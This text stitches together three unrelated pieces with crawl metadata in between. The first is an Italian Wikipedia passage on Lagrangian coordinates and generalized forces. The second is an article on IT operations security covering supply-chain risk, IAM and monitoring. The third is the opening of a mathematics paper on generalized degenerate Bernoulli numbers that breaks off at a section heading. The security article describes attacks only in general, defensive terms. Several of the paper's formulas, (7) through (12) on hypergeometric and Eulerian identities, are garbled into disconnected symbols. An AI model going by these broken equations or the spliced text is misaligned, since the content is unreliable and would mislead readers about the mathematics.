se :\quad T_{(\bar 0)} \stackrel{\mathrm{\Delta}}{=} \quad \frac{1}{2}\sum_{n = 1}^N {m_n} (\frac{\partial \bar x_n}{\partial t})^2,
\quad \nabla_i T_{(\bar 0)} \stackrel{\mathrm{\Delta}}{=} \quad \frac{\partial}{\partial r_i} \sum_{n = 1}^N m_n \bar x_n \frac{\partial \bar x_n}{\partial t} = \sum_{n = 1}^N {m_n} \frac{(\partial \bar x_n)^2}{\partial r_i \partial t}, \, per sistemi classici in cui la massa non dipende dalle coordinate generalizzate: \nabla m_n = \bar 0, \,
\quad \bar \bar H_{ij} T_{(\bar 0)} \stackrel{\mathrm{\Delta}}{=} \quad \frac{{\partial}^2}{\partial r_i \partial r_j} \sum_{n = 1}^N m_n (\bar x_n)^2 = \sum_{n = 1}^N {m_n} \frac{(\partial \bar x_n)^2}{\partial r_i \partial r_j}, \, per sistemi classici in cui la massa non dipende dalle coordinate generalizzate: \bar \bar H m_n = \bar 0.
Quindi riassumendo vettorialmente l'identità scalare:
T_{(\dot {\bar r})}= T_{(\bar 0)} + \sum_{i=1}^{I}\nabla_i T_{(\bar 0)} \dot r_i + \frac{1}{2}\sum_{i, j=1}^{I} H_{ij} T_{(\bar 0)} \dot r_i \dot r_j
si ottiene infine:
T_{(\dot {\bar r})}= T_{(\bar 0)} + \nabla T_{(\bar 0)} \cdot \dot {\bar r} + \frac{1}{2} \dot {\bar r} \cdot \bar \bar H T_{(\bar 0)} \cdot \dot {\bar r}
T : \R^I \to \R
L'energia cinetica in coordinate lagrangiane è in conclusione una serie di Taylor in I variabili del second'ordine nel vettore velocità \dot {\bar r}, definita positiva poiché lo è l'hessiana H che vi compare. Inoltre i due termini lineare \nabla T_{(\bar 0)} e costante T_{(\bar 0)} dipendono in generale dal tempo: nel caso di un sistema olonomo l'energia cinetica si riduce a
T|_{(\frac{\partial \bar x_n}{\partial t} = 0)} = \frac{1}{2} \dot {\bar r} \cdot \bar \bar H_{\dot {\bar r}}T_{(\bar 0)} \cdot \dot {\bar r} = \frac{1}{2} \bar p \cdot \dot {\bar r}
È importante ricordare che le coordinate lagrangiane rispetto a cui si determina l'energia cinetica hanno l'ulteriore vantaggio di non dovere necessariamente essere inerziali, a differenza di quelle cartesiane.
Forza generalizzata[modifica | modifica wikitesto]
Le forze generalizzate sono definite come in numero di I grandezze scalari, con I il grado di libertà del sistema:
F_i \stackrel{\mathrm{\Delta}}{=} \frac{\partial W}{\partial r_i} = \sum_{n = 1}^N \bar F_n \cdot \frac{\partial \bar x_n}{\partial r_i},
Dove W è il lavoro della risultante attiva F agente sul sistema. Si tratta quindi in termini newtoniani per variabili lunghezza e angolo rispettivamente delle grandezze forza e momento meccanico prese lungo la variabile, nel caso più generale di una combinazione delle due.
Nel caso di vincoli bilaterali permettono di ignorare nell'analisi del sistema le reazioni vincolari (di risultante R), anche per sistemi scleronomi: dato uno spostamento virtuale \delta x_n, ottenuto considerando solo gli spostamenti ammissibili con i vincoli considerati come fissi all'istante di riferimento, il lavoro virtuale agente sull'n-esima particella del sistema vale:
\delta W_n=(\bar F_n+\bar R_n)\cdot \bar \delta \bar x_n
Se i vincoli del sistema sono bilaterali, per il principio delle reazioni vincolari i lavori virtuali vincolari sono nulli, e cioè le reazioni sono ortogonali agli spostamenti virtuali:
\delta W_{i}=F_i\cdot \delta \bar x_i
Esprimendo \delta \bar x_n in funzione delle coordinate generalizzate r_i, e ricordando che \frac{\partial \bar x_n}{\partial t}=0 per definizione di spostamento virtuale:
\delta W_{n}=\sum_{i=1}^I \bar F_n\cdot \frac{\partial \bar x_n}{\partial r_i}\delta r_i=\sum_{i=1}^I F_{n,i} \cdot \delta r_i
Il lavoro virtuale sulla particella sottoposta a vincoli bilaterali è cioè interamente calcolabile tramite le forze generalizzate agenti su di essa. A livello ingegneristico dove è necessario risalire allo sforzo che dovrebbe essere fatto da tutte le forze non vincolari se il sistema subisse uno spostamento virtuale \delta r_h, oppure alle sollecitazioni esterne imposte realmente dai vincoli, l'approccio Lagrangiano risulta quindi particolarmente utile.
In base alle equazioni di Lagrange del I tipo e in forma di Nielsen si può legare la forza generalizzata all'energia cinetica del sistema: F_i = \dot p_i = {\partial{T}\over \partial{\dot r_i}} - 2 {\partial{T}\over \partial r_i}, Si noti ancora che la forza generalizzata differisce in generale per il secondo termine - \frac{\partial T}{\partial r_i} dalla derivata temporale della quantità di moto \dot q_i, cui si arriverebbe erroneamente inducendo una generalizzazione da una definizione di forza basata sul secondo principio della dinamica, valida solo per la dinamica newtoniana.
Bibliografia[modifica | modifica wikitesto]
• Wells, D.A., Schaum's Outline of Lagrangian Dynamics; McGraw-Hill, Inc. New York, 1967.
Voci correlate[modifica | modifica wikitesto]
Collegamenti esterni[modifica | modifica wikitesto]
Meccanica Portale Meccanica: accedi alle voci di Wikipedia che trattano di Meccanica
|
{
"url": "http://it.wikipedia.org/wiki/Coordinate_lagrangiane",
"source_domain": "it.wikipedia.org",
"snapshot_id": "crawl=CC-MAIN-2014-52",
"warc_metadata": {
"Content-Length": "65186",
"Content-Type": "application/http; msgtype=response",
"WARC-Block-Digest": "sha1:PEJUFDMMAOLV7PDXJPIJVBOV4GIL3QD3",
"WARC-Concurrent-To": "<urn:uuid:84e6335f-2238-4956-a9d5-63cf2c1b3250>",
"WARC-Date": "2014-12-22T01:44:35Z",
"WARC-IP-Address": "208.80.154.224",
"WARC-Identified-Payload-Type": null,
"WARC-Payload-Digest": "sha1:F743FYHZ2CFLM4G4SYEXCTXNUXJLL5V5",
"WARC-Record-ID": "<urn:uuid:40d05205-94f1-4033-aa99-789e4ec82d40>",
"WARC-Target-URI": "http://it.wikipedia.org/wiki/Coordinate_lagrangiane",
"WARC-Truncated": null,
"WARC-Type": "response",
"WARC-Warcinfo-ID": "<urn:uuid:15a98194-0377-48e2-a568-ff0a7a751437>"
},
"warc_info": "robots: classic\r\nhostname: ip-10-231-17-201.ec2.internal\r\nsoftware: Nutch 1.6 (CC)/CC WarcExport 1.0\r\nisPartOf: CC-MAIN-2014-52\r\noperator: CommonCrawl Admin\r\ndescription: Wide crawl of the web with URLs provided by Blekko for December 2014\r\npublisher: CommonCrawl\r\nformat: WARC File Format 1.0\r\nconformsTo: http://bibnum.bnf.fr/WARC/WARC_ISO_28500_version1_latestdraft.pdf"
}
|
{
"line_start_idx": [
0,
25,
26,
63,
108,
211,
212,
429,
430,
473,
474,
788,
789,
791,
836,
869,
891,
921,
933,
934,
1521,
1522,
1560,
1561,
2715,
2716,
3118,
3119,
3601,
3602,
4106,
4107,
4183,
4297,
4298,
4432,
4433,
4487,
4488,
4550,
4551,
4652,
4653,
4707,
4708,
4810,
4811,
4852,
4853,
5282,
5283,
5316,
5317,
5400,
5401,
5684,
5685,
5740,
5741,
5846,
5847,
5909,
5910,
6019,
6020,
6287,
6288,
6301,
6302,
6413,
6414,
6566,
6567,
6656,
6657,
6789,
6790,
6857,
6858,
7042,
7043,
7143,
7144,
7448,
7449,
7692,
7693,
7769,
7770,
7857,
7858,
7879,
7999,
8000,
8161,
8162,
8446,
8447,
8511,
8512,
8832,
8833,
8966,
8967,
9313,
9654,
9655,
9709,
9710,
9860,
9861,
9880,
9881,
10036,
10053,
10054,
10433,
10434,
10617,
10618,
10829,
10830,
10881,
10882,
10997,
10998,
11136,
11137,
11411,
11412,
11792,
11793,
11850,
11851,
12037,
12038,
12076,
12077,
12249,
12250,
12377,
12378,
12836,
12837,
13426,
13427,
13471,
13472,
13564,
13565,
13611,
13612,
13664,
13665
],
"line_end_idx": [
25,
26,
63,
108,
211,
212,
429,
430,
473,
474,
788,
789,
791,
836,
869,
891,
921,
933,
934,
1521,
1522,
1560,
1561,
2715,
2716,
3118,
3119,
3601,
3602,
4106,
4107,
4183,
4297,
4298,
4432,
4433,
4487,
4488,
4550,
4551,
4652,
4653,
4707,
4708,
4810,
4811,
4852,
4853,
5282,
5283,
5316,
5317,
5400,
5401,
5684,
5685,
5740,
5741,
5846,
5847,
5909,
5910,
6019,
6020,
6287,
6288,
6301,
6302,
6413,
6414,
6566,
6567,
6656,
6657,
6789,
6790,
6857,
6858,
7042,
7043,
7143,
7144,
7448,
7449,
7692,
7693,
7769,
7770,
7857,
7858,
7879,
7999,
8000,
8161,
8162,
8446,
8447,
8511,
8512,
8832,
8833,
8966,
8967,
9313,
9654,
9655,
9709,
9710,
9860,
9861,
9880,
9881,
10036,
10053,
10054,
10433,
10434,
10617,
10618,
10829,
10830,
10881,
10882,
10997,
10998,
11136,
11137,
11411,
11412,
11792,
11793,
11850,
11851,
12037,
12038,
12076,
12077,
12249,
12250,
12377,
12378,
12836,
12837,
13426,
13427,
13471,
13472,
13564,
13565,
13611,
13612,
13664,
13665,
13749
]
}
|
{
"red_pajama_v2": {
"ccnet_original_length": 13749,
"ccnet_original_nlines": 153,
"rps_doc_curly_bracket": 0.03302057832479477,
"rps_doc_ldnoobw_words": 0,
"rps_doc_lorem_ipsum": 0,
"rps_doc_stop_word_fraction": 0.07723577320575714,
"rps_doc_ut1_blacklist": 0,
"rps_doc_frac_all_caps_words": 0.03908693045377731,
"rps_doc_frac_lines_end_with_ellipsis": 0,
"rps_doc_frac_no_alph_words": 0.3411507308483124,
"rps_doc_frac_unique_words": 0.31643542647361755,
"rps_doc_mean_word_length": 5.427427768707275,
"rps_doc_num_sentences": 44,
"rps_doc_symbol_to_word_ratio": 0,
"rps_doc_unigram_entropy": 5.652190208435059,
"rps_doc_word_count": 1874,
"rps_doc_frac_chars_dupe_10grams": 0.019467109814286232,
"rps_doc_frac_chars_dupe_5grams": 0.08917511254549026,
"rps_doc_frac_chars_dupe_6grams": 0.06459542363882065,
"rps_doc_frac_chars_dupe_7grams": 0.04925768822431564,
"rps_doc_frac_chars_dupe_8grams": 0.04502999037504196,
"rps_doc_frac_chars_dupe_9grams": 0.035198111087083817,
"rps_doc_frac_chars_top_2gram": 0.0066856699995696545,
"rps_doc_frac_chars_top_3gram": 0.006882309913635254,
"rps_doc_frac_chars_top_4gram": 0.007570540066808462,
"rps_doc_books_importance": -1524.302734375,
"rps_doc_books_importance_length_correction": -1524.302734375,
"rps_doc_openwebtext_importance": -686.4326171875,
"rps_doc_openwebtext_importance_length_correction": -686.4326171875,
"rps_doc_wikipedia_importance": -515.3936767578125,
"rps_doc_wikipedia_importance_length_correction": -515.3936767578125
},
"fasttext": {
"dclm": 0.9482028484344482,
"english": 0.0068221199326217175,
"fineweb_edu_approx": 1.4595177173614502,
"eai_general_math": 0.004605109803378582,
"eai_open_web_math": 0.9964366555213928,
"eai_web_code": 0.5137715339660645
}
}
|
{
"free_decimal_correspondence": {
"primary": {
"code": "531.01",
"labels": {
"level_1": "Science and Natural history",
"level_2": "Physics",
"level_3": "Mechanics"
}
},
"secondary": {
"code": "515.64",
"labels": {
"level_1": "Science and Natural history",
"level_2": "Mathematics",
"level_3": "Calculus and Mathematical analysis"
}
}
},
"bloom_cognitive_process": {
"primary": {
"code": "4",
"label": "Analyze"
},
"secondary": {
"code": "2",
"label": "Understand"
}
},
"bloom_knowledge_domain": {
"primary": {
"code": "2",
"label": "Conceptual"
},
"secondary": {
"code": "3",
"label": "Procedural"
}
},
"document_type_v1": {
"primary": {
"code": "3",
"label": "Reference/Encyclopedic/Educational"
},
"secondary": {
"code": "-1",
"label": "Abstain"
}
},
"extraction_artifacts": {
"primary": {
"code": "0",
"label": "No Artifacts"
},
"secondary": {
"code": "-1",
"label": "Abstain"
}
},
"missing_content": {
"primary": {
"code": "0",
"label": "No missing content"
},
"secondary": {
"code": "4",
"label": "Missing Images or Figures"
}
},
"document_type_v2": {
"primary": {
"code": "10",
"label": "Knowledge Article"
},
"secondary": {
"code": "8",
"label": "Documentation"
}
},
"reasoning_depth": {
"primary": {
"code": "4",
"label": "Advanced Reasoning"
},
"secondary": {
"code": "3",
"label": "Intermediate Reasoning"
}
},
"technical_correctness": {
"primary": {
"code": "4",
"label": "Highly Correct"
},
"secondary": {
"code": "3",
"label": "Mostly Correct"
}
},
"education_level": {
"primary": {
"code": "3",
"label": "Undergraduate Level"
},
"secondary": {
"code": "4",
"label": "Graduate/Expert Level"
}
}
}
|
71f077df794da2774531b20248bb19b0
|
3,034,083,482,456,645,600
|
E-Handbook:
The ops team's role in securing IT infrastructure and apps
James Thew - Fotolia
Which IT security roles fall to the ops team?
To help secure data and applications, an IT ops team needs to do much more than put up firewalls and apply other traditional security measures. Here's where to begin.
Specter, Meltdown and similar zero-day vulnerabilities are the scary sorts of things that keep operations teams -- especially those with IT security roles -- awake at night. Fortunately for most cloud-based companies, those vulnerabilities can be addressed with the latest software updates or an adjustment to your Amazon Elastic Compute Cloud machine images. Organizations that run on serverless platforms have it even easier, needing only to wait for Amazon, Microsoft or Google to apply the patches to the underlying hardware.
Still, these vulnerabilities account for only a small fraction of the attack surface that modern-day operations teams must watch over.
To take their IT security roles seriously, these staffers need to be concerned with stolen credentials and corrupted code repositories, among numerous other threats. Custom alerts can help ops teams detect abnormal conditions, and software-testing procedures can be adjusted to include security risk detection. There's plenty for ops to do.
Consider a Node.js application launched using the serverless platform on AWS Lambda. Every dependency included in an application could potentially become compromised and lead to malicious code being installed on your site. Such a calamity could result in the loss of your users' data or your intellectual property.
Systems for continuous integration (CI) and continuous delivery (CD) allow developers to iterate much faster. This is generally a good thing, since it produces much smaller deployments and generally results in fewer bugs. Unfortunately, these CI/CD tools tend to rely on third-party systems to gather packages and requirements, and those repositories can become compromised.
One recent outage, for example, showed a critical vulnerability in the NPM code repository. Supposedly safe packages were replaced with nearly identical ones containing attack code. Since NPM packages can include build and deployment hooks as well, this could do anything from stealing AWS credentials used to deploy your application to harvesting credit card numbers and passwords. Even packages you've completely validated as safe and have been using for years could have been compromised during a new deployment.
Previously, operations teams could mitigate some of this risk simply by controlling the hardware. Also, they could put in place specialized firewalls to prevent suspicious network traffic from causing issues, such as a site trying to upload credit card numbers to a known malicious IP address. With the move to cloud serverless technologies, much of this control has been taken away from ops, even while their IT security roles remain.
Adding Detection to the CI/CD Process
For teams with well-defined CI/CD practices, the build process should already have automated unit testing in place for bugs. It's a natural progression to also require that build step to add in tests for security vulnerabilities. Many tools and organizations can help with this sort of thing, including Snyk and the Open Web Application Security Project, or OWASP. Ops teams are typically responsible for setting up these types of tools, and many of them can be set to run one-time scans before a build, as well as perform ongoing checks of production systems.
Additionally, ops teams with IT security roles or concerns may choose to create a custom in-house repository. For example, NPM Enterprise allows companies to include a feature-compatible version of NPM. This can be maintained by an internal team, behind a firewall, and it prevents the installation of third-party plug-ins that aren't pre-approved. This can lead to faster, more secure and more reliable deployments.
Anomaly detection and manual approval of suspicious requests can be useful in preventing unwanted activity.
Some attacks result from things that cannot be identified before a system is in production. For example, users' accounts can be breached. Or, even worse, a developer's account can be compromised.
With AWS, it's critically important that each service has strict identity permissions. For example, a user's API probably shouldn't have the ability to create new Elastic Compute Cloud instances or to delete users. Developers should be brought along slowly and not granted write access until after they've proven they aren't going to accidentally wipe out the entire database. And no one should have root AWS credentials, except maybe the CTO.
It's also important to make sure all identity and access management (IAM) users are required to have multifactor authentication (MFA) tokens set up, and it may be useful to turn on S3 versioning as well as require an MFA token to delete S3 objects.
It's always a good idea to back up critical data in another location -- and encrypt it, if it's sensitive. It's important to note, however, that when you store backups in different locations, you're increasing the exposure of that data to attackers. More backups are not always better.
Most cloud providers offer managed backup options. Those should always be the first choice.
Monitor for unusual activity
Even with strict policies in place and personnel focused on IT security roles, it's inevitable that something will go wrong. Credentials will either be leaked accidentally or be exposed through some malicious code installed on someone's computer.
It's important for operations teams to monitor cloud activity. For AWS users, this is typically done via CloudWatch. In Azure, consider Operational Insights, Application Insights or other monitoring tools.
It's also worth setting up custom alarms. These help you spot abnormalities, such as when an IAM account performs operations that deviate from normal patterns; that unusual behavior could indicate a system compromise.
It can be trickier to identify issues with end users. While some problems can be obvious -- such as when a user tries to log into their account from China an hour after logging in from California -- other situations aren't as readily apparent. Anomaly detection and manual approval of suspicious requests can be useful in preventing unwanted activity. Several services can help manage these types of rules, and most authentication services, such as Auth0, already provide built-in anomaly detection.
Web application firewalls can also provide added protection to your web-based access points by blocking traffic using pre-defined rules from communities, as well as custom logic based on patterns your operations team identifies.
For example, if someone is trying to access a wp-admin URL on your custom in-house application, chances are they're trying to hack into something. Many of the targeted vulnerabilities are for WordPress and applications in the PHP scripting language, so operations teams should be on the lookout for requests for suspicious URLs and be ready to block all traffic from offending IP addresses.
Dig Deeper on Systems automation and orchestration
Software Quality
App Architecture
Cloud Computing
SearchAWS
TheServerSide.com
Data Center
Close
|
{
"url": "https://www.techtarget.com/searchitoperations/feature/Which-IT-security-roles-fall-to-the-ops-team",
"source_domain": "www.techtarget.com",
"snapshot_id": "crawl=CC-MAIN-2022-49",
"warc_metadata": {
"Content-Length": "331604",
"Content-Type": "application/http; msgtype=response",
"WARC-Block-Digest": "sha1:SNWU5U5V5JOVLRIQ2CGPZHODYD3IYIX2",
"WARC-Concurrent-To": "<urn:uuid:a8508fd8-1845-4127-9ea3-b4347d10bce7>",
"WARC-Date": "2022-12-05T11:44:16Z",
"WARC-IP-Address": "104.18.12.159",
"WARC-Identified-Payload-Type": "text/html",
"WARC-Payload-Digest": "sha1:MNAMQZBK34VVMS4U3CTTKQ6AOULDLBLV",
"WARC-Record-ID": "<urn:uuid:5ae9c089-b552-44ed-b90b-eb518568aafb>",
"WARC-Target-URI": "https://www.techtarget.com/searchitoperations/feature/Which-IT-security-roles-fall-to-the-ops-team",
"WARC-Truncated": null,
"WARC-Type": "response",
"WARC-Warcinfo-ID": "<urn:uuid:b18eae2f-79ca-42ca-8e0e-109019c02765>"
},
"warc_info": "isPartOf: CC-MAIN-2022-49\r\npublisher: Common Crawl\r\ndescription: Wide crawl of the web for November/December 2022\r\noperator: Common Crawl Admin ([email protected])\r\nhostname: ip-10-67-67-125\r\nsoftware: Apache Nutch 1.19 (modified, https://github.com/commoncrawl/nutch/)\r\nrobots: checked via crawler-commons 1.4-SNAPSHOT (https://github.com/crawler-commons/crawler-commons)\r\nformat: WARC File Format 1.1\r\nconformsTo: https://iipc.github.io/warc-specifications/specifications/warc-format/warc-1.1/"
}
|
{
"line_start_idx": [
0,
12,
13,
72,
73,
94,
95,
141,
142,
309,
310,
840,
841,
976,
977,
1318,
1319,
1634,
1635,
2010,
2011,
2527,
2528,
2964,
2965,
3003,
3004,
3565,
3566,
3983,
3984,
4092,
4093,
4289,
4290,
4734,
4735,
4984,
4985,
5271,
5272,
5364,
5365,
5394,
5395,
5642,
5643,
5849,
5850,
6068,
6069,
6569,
6570,
6799,
6800,
7191,
7192,
7243,
7244,
7261,
7278,
7294,
7304,
7322,
7334
],
"line_end_idx": [
12,
13,
72,
73,
94,
95,
141,
142,
309,
310,
840,
841,
976,
977,
1318,
1319,
1634,
1635,
2010,
2011,
2527,
2528,
2964,
2965,
3003,
3004,
3565,
3566,
3983,
3984,
4092,
4093,
4289,
4290,
4734,
4735,
4984,
4985,
5271,
5272,
5364,
5365,
5394,
5395,
5642,
5643,
5849,
5850,
6068,
6069,
6569,
6570,
6799,
6800,
7191,
7192,
7243,
7244,
7261,
7278,
7294,
7304,
7322,
7334,
7339
]
}
|
{
"red_pajama_v2": {
"ccnet_original_length": 7339,
"ccnet_original_nlines": 64,
"rps_doc_curly_bracket": 0,
"rps_doc_ldnoobw_words": 0,
"rps_doc_lorem_ipsum": 0,
"rps_doc_stop_word_fraction": 0.38814815878868103,
"rps_doc_ut1_blacklist": 0,
"rps_doc_frac_all_caps_words": 0.028888890519738197,
"rps_doc_frac_lines_end_with_ellipsis": 0,
"rps_doc_frac_no_alph_words": 0.1303703635931015,
"rps_doc_frac_unique_words": 0.44946807622909546,
"rps_doc_mean_word_length": 5.315602779388428,
"rps_doc_num_sentences": 62,
"rps_doc_symbol_to_word_ratio": 0,
"rps_doc_unigram_entropy": 5.678710460662842,
"rps_doc_word_count": 1128,
"rps_doc_frac_chars_dupe_10grams": 0.0306871198117733,
"rps_doc_frac_chars_dupe_5grams": 0.0306871198117733,
"rps_doc_frac_chars_dupe_6grams": 0.0306871198117733,
"rps_doc_frac_chars_dupe_7grams": 0.0306871198117733,
"rps_doc_frac_chars_dupe_8grams": 0.0306871198117733,
"rps_doc_frac_chars_dupe_9grams": 0.0306871198117733,
"rps_doc_frac_chars_top_2gram": 0.00833889003843069,
"rps_doc_frac_chars_top_3gram": 0.015010010451078415,
"rps_doc_frac_chars_top_4gram": 0.006337559781968594,
"rps_doc_books_importance": -464.2124938964844,
"rps_doc_books_importance_length_correction": -464.2124938964844,
"rps_doc_openwebtext_importance": -297.6188049316406,
"rps_doc_openwebtext_importance_length_correction": -297.6188049316406,
"rps_doc_wikipedia_importance": -193.3371124267578,
"rps_doc_wikipedia_importance_length_correction": -193.3371124267578
},
"fasttext": {
"dclm": 0.06389951705932617,
"english": 0.9531274437904358,
"fineweb_edu_approx": 1.9673309326171875,
"eai_general_math": 0.24987471103668213,
"eai_open_web_math": 0.18860214948654175,
"eai_web_code": 0.5211954116821289
}
}
|
{
"free_decimal_correspondence": {
"primary": {
"code": "005.82",
"labels": {
"level_1": "General works, books and libraries, information sciences",
"level_2": "",
"level_3": "Computer programming"
}
},
"secondary": {
"code": "004.0285",
"labels": {
"level_1": "General works, books and libraries, information sciences",
"level_2": "",
"level_3": "Computers and Computer science"
}
}
},
"bloom_cognitive_process": {
"primary": {
"code": "3",
"label": "Apply"
},
"secondary": {
"code": "2",
"label": "Understand"
}
},
"bloom_knowledge_domain": {
"primary": {
"code": "3",
"label": "Procedural"
},
"secondary": {
"code": "2",
"label": "Conceptual"
}
},
"document_type_v1": {
"primary": {
"code": "3",
"label": "Reference/Encyclopedic/Educational"
},
"secondary": {
"code": "-1",
"label": "Abstain"
}
},
"extraction_artifacts": {
"primary": {
"code": "3",
"label": "Irrelevant Content"
},
"secondary": {
"code": "0",
"label": "No Artifacts"
}
},
"missing_content": {
"primary": {
"code": "0",
"label": "No missing content"
},
"secondary": {
"code": "-1",
"label": "Abstain"
}
},
"document_type_v2": {
"primary": {
"code": "10",
"label": "Knowledge Article"
},
"secondary": {
"code": "8",
"label": "Documentation"
}
},
"reasoning_depth": {
"primary": {
"code": "3",
"label": "Intermediate Reasoning"
},
"secondary": {
"code": "2",
"label": "Basic Reasoning"
}
},
"technical_correctness": {
"primary": {
"code": "4",
"label": "Highly Correct"
},
"secondary": {
"code": "3",
"label": "Mostly Correct"
}
},
"education_level": {
"primary": {
"code": "3",
"label": "Undergraduate Level"
},
"secondary": {
"code": "2",
"label": "High School Level"
}
}
}
|
71f077df794da2774531b20248bb19b0
|
-129,190,027,616,481,140
|
Skip to main content
Theory and Modern Applications
Generalized degenerate Bernoulli numbers and polynomials arising from Gauss hypergeometric function
Abstract
A new family of p-Bernoulli numbers and polynomials was introduced by Rahmani (J. Number Theory 157:350–366, 2015) with the help of the Gauss hypergeometric function. Motivated by that paper and in the light of the recent interests in finding degenerate versions, we construct the generalized degenerate Bernoulli numbers and polynomials by means of the Gauss hypergeometric function. In addition, we construct the degenerate type Eulerian numbers as a degenerate version of Eulerian numbers. For the generalized degenerate Bernoulli numbers, we express them in terms of the degenerate Stirling numbers of the second kind, of the degenerate type Eulerian numbers, of the degenerate p-Stirling numbers of the second kind and of an integral on the unit interval. As to the generalized degenerate Bernoulli polynomials, we represent them in terms of the degenerate Stirling polynomials of the second kind.
1 Introduction
We have witnessed in recent years that many interesting arithmetic and combinatorial results were obtained in studying degenerate versions of some special polynomials and numbers (see [713] and the references therein), which was initiated by Carlitz when he introduced the degenerate Stirling, Bernoulli and Euler numbers in [3]. The studies have been done with various different tools such as combinatorial methods, generating functions, umbral calculus, p-adic analysis, differential equations, special functions, probability theory and analytic number theory. It should be noted that studying degenerate versions can be done not only for polynomials but also for transcendental functions. Indeed, the degenerate gamma functions were introduced as a degenerate version of ordinary gamma functions in [9]. The degenerate special polynomials and numbers have potential to find diverse applications in many areas just as ‘ordinary’ special polynomials and numbers play very important role in science and engineering as well as in mathematics. Indeed, it was shown in [10, 11] that the expressions of the probability distributions of appropriate random variables can be represented in terms of both the degenerate λ-Stirling polynomials of the second kind and the r-truncated degenerate λ-Stirling polynomials of the second kind.
In [14], Rahmani introduced a new family of p-Bernoulli numbers and polynomials by means of the Gauss hypergeometric function which reduce to the classical Bernoulli numbers and polynomials for \(p=0\). Motivated by that paper and as a degenerate version of those numbers and polynomials, in this paper we introduce the generalized degenerate Bernoulli numbers and polynomials again in terms of the Gauss hypergeometric function which reduce to the Carlitz degenerate Bernoulli numbers and polynomials for \(p=0\). In addition, we introduce the degenerate type Eulerian numbers as a degenerate version of Eulerian numbers. The aim of this paper is to study the generalized degenerate Bernoulli numbers and polynomials and to show their connections to other special numbers and polynomials. Among other things, for the generalized degenerate Bernoulli numbers we express them in terms of the degenerate Stirling numbers of the second kind, of the degenerate type Eulerian numbers, of the degenerate p-Stirling numbers of the second kind and of an integral on the unit interval. As to the generalized degenerate Bernoulli polynomials, we represent them in terms of the degenerate Stirling polynomials of the second kind. For the rest of this section, we recall the necessary facts that are needed throughout this paper.
For any \(\lambda \in \mathbb{R}\), the degenerate exponential functions are defined by
$$ e_{\lambda }^{x}(t)=\sum_{n=0}^{\infty }(x)_{n,\lambda } \frac{t^{n}}{n!}, e_{\lambda }(t)=e_{\lambda }^{1}(t)\quad ( \text{see [6, 9]}), $$
(1)
where \((x)_{0,\lambda }=1, (x)_{n,\lambda }=x(x-\lambda )\cdots (x-(n-1) \lambda )\) \((n\ge 1)\). Note that \(\lim_{\lambda \rightarrow 0}e^{x}_{\lambda }(t)=e^{xt} \).
Let \(\log _{\lambda }(t)\) be the compositional inverse function of \(e_{\lambda }(t)\) with \(\log _{\lambda } (e_{\lambda }(t) )=e_{\lambda } (\log _{ \lambda }(t) )=t\). Then we have
$$ \log _{\lambda }(1+t)=\sum_{n=1}^{\infty } \lambda ^{n-1}(1)_{n,1/ \lambda }\frac{t^{n}}{n!} \quad(\text{see [7]}). $$
(2)
In [7], the degenerate Stirling numbers of the first kind are defined by
$$ (x)_{n}=\sum_{l=0}^{n}S_{1,\lambda }(n,l) (x)_{l,\lambda } \quad(n\ge 0), $$
(3)
where \((x)_{0}=1, (x)_{n}=x(x-1)(x-2)\cdots (x-n+1)\) \((n\ge 1)\).
As the inversion formula of (3), the degenerate Stirling numbers of the second kind are defined by
$$ (x)_{n,\lambda }=\sum_{k=0}^{n}S_{2,\lambda }(n,k) (x)_{k} \quad(n\ge 0)\ (\text{see [7]}). $$
(4)
From (3) and (4), we note that
$$ \frac{1}{k!} \bigl(\log _{\lambda }(1+t) \bigr)^{k}=\sum _{n=k}^{\infty }S_{1, \lambda }(n,k) \frac{t^{n}}{n!}, $$
(5)
and
$$ \frac{1}{k!} \bigl(e_{\lambda }(t)-1 \bigr)^{k}=\sum _{n=k}^{\infty }S_{2, \lambda }(n,k) \frac{t^{n}}{n!} \quad(k\ge 0)\ (\text{see [7]}). $$
(6)
It is well known that the Gauss hypergeometric function is given by
F 1 2 ( a , b c | x ) = k = 0 a k b k c k x k k ! (see [1, 2, 12]),
(7)
where \(\langle a\rangle _{0}=1, \langle a\rangle _{k}=a(a+1)\cdots (a+k-1), (k\ge 1)\).
The Euler transformation formula is given by
F 1 2 ( a , b c | x ) = ( 1 x ) c a b 2 F 1 ( c a , c b c | x ) (see [1, 2]).
(8)
The Eulerian number n k is the number of permutation \(\{1,2,3,\dots,n\}\) having k permutation ascents. The Eulerian numbers are given explicitly by the finite sum
n k = j = 0 k + 1 ( 1 ) j ( n + 1 j ) ( k j + 1 ) n (n,k0,nk)
(9)
and
k = 0 n n k =n!(see [4, 5]).
(10)
For \(n,m\ge 0\), we have
n m = k = 0 n m S 2 (n,k) ( n k m ) ( 1 ) n k m k!(see [5])
(11)
and
x n = k = 0 n n k ( x + k n ) (see [4, 5]).
(12)
Recently, the degenerate Stirling polynomials of the second kind were defined by
$$ \frac{1}{k!} \bigl(e_{\lambda }(t)-1 \bigr)^{k}e_{\lambda }^{x}(t)= \sum_{n=k}^{ \infty }S_{2,\lambda }(n,k|x) \frac{t^{n}}{n!} (k\ge 0)\quad (\text{see [8]}). $$
(13)
Thus, by (13), we get
$$\begin{aligned} S_{2,\lambda }(n,k|x) &= \sum_{l=k}^{n} \binom{n}{l}S_{2,\lambda }(l,k) (x)_{n-l, \lambda } \quad(\text{see [8]}) \\ &= \sum_{l=0}^{n}\binom{n}{l}S_{2,\lambda }(l,k) (x)_{n-l,\lambda } \quad(n\ge 0). \end{aligned}$$
(14)
For \(x=0\), \(S_{2,\lambda }(n,k)=S_{2,\lambda }(n,k|0)\) \((n,k\ge 0, n\ge k)\), are called the degenerate Stirling numbers of the second kind.
Carlitz introduced the degenerate Bernoulli polynomials given by
$$ \frac{t}{e_{\lambda }(t)-1}e_{\lambda }^{x}(t)=\sum _{n=0}^{\infty } \beta _{n,\lambda }(x)\frac{t^{n}}{n!}\quad (\text{see [3]}). $$
(15)
When \(x=0\), \(\beta _{n,\lambda }=\beta _{n,\lambda }(0)\) \((n\ge 0)\), are called the degenerate Bernolli numbers.
2 Generalized degenerate Bernoulli numbers
By (1) and (2), we get
